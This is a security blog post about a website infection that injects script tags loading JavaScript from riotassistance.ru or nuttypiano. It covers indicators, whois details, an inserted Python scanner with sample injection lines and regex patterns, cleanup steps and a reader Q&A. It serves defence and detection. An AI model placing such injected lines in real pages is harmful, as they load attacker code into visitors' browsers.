riotassistance.ru infections
We’ve been seeing more website infections with a malscript that looks like:
(opening script tag) src="hxxp:// riotassistance.ru /Website.js">(closing script tag)
Note: We’ve also seen this same thing but with nuttypiano replacing riotassistance.
Sometimes the last part: Website.js is something else:
Linux.js
Megabyte.js
and a few others. The common pattern here is obviously the riotassistance.ru domain and the last part of the URL has an upper-case first letter and is usually some random, but familiar word.
The other identifier is the seemingly useless string immediately following the malscript. In the example above it’s the:
Keep in mind that this will be different for each website, at least from what we’ve seen so far.
This malscript and its associated string have been found in index files and files that start with the word main, or in the footer.php file on WordPress sites. The footer.php that will be infected is usually in the theme folder for your site. So if you’re using the default theme, it will be the footer.php file in the theme/default folder on your site.
This same infection has also been found in .js files, as a document.write at the bottom of the .js file.
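A scanner for the indicators described above, added here as an example (it is not code from the original post): it flags references to the two domains in web files, whether they appear as a script tag or inside a document.write. The function names, the file extension list, the sample input and the assumption that nuttypiano also sits under .ru are assumptions of this example.

```python
import os
import re
import sys

# Domains named on the page; "nuttypiano" is assumed to sit under .ru as well.
# Tolerates the page's defanged form ("hxxp", spaces around the host) and the
# backslash-escaped quotes seen inside a document.write string.
IOC = re.compile(
    r"""src\s*=\s*\\?["']?\s*h(?:tt|xx)ps?://\s*"""
    r"""((?:riotassistance|nuttypiano)\.ru)\s*/\s*([\w.-]+\.js)""",
    re.IGNORECASE)
EXTS = (".php", ".html", ".htm", ".js")  # assumed set of web file types

# Constructed sample, kept defanged; not taken from a real infected site.
SAMPLE = "\n".join([
    '<div id="footer"></div>',
    '<script src="hxxp:// riotassistance.ru /Website.js"></script>',
    r"""document.write('<script src=\"hxxp://nuttypiano.ru/Linux.js\"><\/script>');""",
    '<script src="/js/main.js"></script>',
])

def scan_text(text):
    """Return (line_no, domain, js_name, via_document_write, capitalised) hits."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in IOC.finditer(line):
            name = m.group(2)
            hits.append((no, m.group(1).lower(), name,
                         "document.write" in line[:m.start()],
                         name[0].isupper()))
    return hits

def scan_tree(root):
    """Walk a web root and yield (path, hit) for each match in a web file."""
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(EXTS):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for hit in scan_text(fh.read()):
                        yield path, hit
            except OSError as exc:
                print(f"skipped {path}: {exc}", file=sys.stderr)

if __name__ == "__main__":
    found = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else \
        (("<sample>", h) for h in scan_text(SAMPLE))
    for path, (no, domain, name, via_dw, cap) in found:
        how = "document.write" if via_dw else "script tag"
        print(f"{path}:{no}: {domain}/{name} ({how}, capitalised={cap})")
```

Run it with the web root as the only argument; with no argument it scans the embedded sample.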
Time to dig a little deeper…
We find that this domain is registered:
domain: RIOTASSISTANCE.RU
nserver: ns1.getyourdns.com.
nserver: ns2.getyourdns.com.
nserver: ns3.getyourdns.com.
nserver: ns4.getyourdns.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 8482 735000
e-mail: angles@fastermail.ru
registrar: NAUNET-REG-RIPN
According to abuse.ch, this registrar has 126 sites that are associated with Zeus.
We also find that the above listed email address is only registered on 4 other domains.
As far as cleaning this goes, obviously remove the malscript from your pages or replace the pages with known good backups.
From what we’ve found so far, this website infection happens via stolen FTP credentials. These FTP credentials are stolen by a virus/trojan on a PC that’s been used to FTP files to the infected website.
First, change all FTP passwords – immediately.
Second, run a full virus scan on all PCs used to FTP files to the infected website. This includes developers, authors, etc.
Third, if your site has been listed as suspicious by Google, request a review from the Google Webmaster Tools.
Post here if you have questions or send me an email if you’d like further help in cleaning this up.
Thank you.

Hi, we’ve been replacing our website with the clean codes and they’re still infected. What kind of FTP trojans should I be looking out for? I’ve just switched to FileZilla FTP; I used to upload using WinSCP. My PCs are all running Kaspersky, updated. Any suggestions for cleaning my website and detecting the source?
You’re running Kaspersky, but do you run full scans of your PCs? If not, please do. We find that people who aren’t running full scans at least once a day will find infections that the anti-virus program didn’t block because it didn’t know about them when the PC was first infected.
So, without running a full scan, a virus or trojan can and will remain undetected for quite some time.
You might also switch to SFTP if your hosting provider supports it. This makes it more difficult to “sniff” the FTP traffic leaving your PCs.